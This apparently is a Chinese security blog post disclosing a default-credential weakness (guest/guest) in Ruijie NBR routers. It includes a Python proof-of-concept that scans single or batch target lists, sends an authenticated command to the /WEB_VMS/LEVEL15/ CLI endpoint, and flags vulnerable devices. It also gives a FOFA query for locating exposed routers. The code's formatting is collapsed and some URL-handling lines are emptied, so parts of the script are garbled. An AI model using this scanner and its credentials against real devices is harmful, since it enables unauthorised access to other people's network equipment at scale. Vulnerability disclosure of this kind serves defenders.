銳捷NBR路由器存在弱口令漏洞

劉一手 鵬組安全

漏洞簡介

銳捷網絡股份有限公司是一家數據通信解決方案提供商。
銳捷網絡股份有限公司NBR路由器存在弱口令漏洞,攻擊者可利用該漏洞獲取敏感信息。

漏洞影響

NBR路由器

漏洞復現

百度上查詢到NBR路由器的默認賬號密碼為guest/guest

在NBR後台管理界面使用默認賬號密碼成功登錄後台

poc

import requestsfrom requests.packages.urllib3.exceptions import InsecureRequestWarning  #消除警告requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  # 消除警告import sysimport argparse
def lemonlove7(): print('FOFA:title="銳捷網絡--NBR路由器--登錄界面"') print('python xxx.py -u/--url xxx.xxx.xxx.xxx') print('python xxx.py -f/--file xxx.txt')    print('lemonlove7')
if len(sys.argv) == 1: lemonlove7() sys.exit()
par = argparse.ArgumentParser(description='lemonlove7 help')
par.add_argument('-u','--url' ,help='輸入url',default='')par.add_argument('-f','--file',help='輸入文件',default='')a = par.parse_args()
url =a.urlfile =a.file
headers = { 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36', 'Content-Type':'text/plain;charset=UTF-8', 'Cookie':'c_name=; hardtype=NBR2000G; web-coding=gb2312; currentURL=; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest', 'Authorization':'Basic Z3Vlc3Q6Z3Vlc3Q='}
data = 'command=show clock&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.'
if url != '': url = url url2 =url try: url1 =url+'/WEB_VMS/LEVEL15/' r =requests.post(url=url1 , data=data,headers=headers,verify=False,timeout=10) #print(r.text) if r.status_code == 200 and 'WebCLI' in r.text: print(url2+'NBR路由器存在弱口令:guest/guest') else: print(url2+'NBR路由器不存在弱口令') except Exception as e: print(url2+'異常')
if file != '': p = open(file,'r+') for i in p.readlines(): url = i.strip() if url.startswith('') != 1 and url.startswith('') != 1: url = ''+url url=url url1=url #print(url) try: url = url +'/WEB_VMS/LEVEL15/' r=requests.post(url=url,headers=headers,data=data,verify=False,timeout=10) if r.status_code == 200 and 'WebCLI' in r.text: print(url1+'NBR路由器存在弱口令:guest/guest') else: print(url1+'NBR路由器不存在弱口令') except Exception as e: print(url1+'異常')

運行效果如下:

單個檢測:

批量檢測:



最新推薦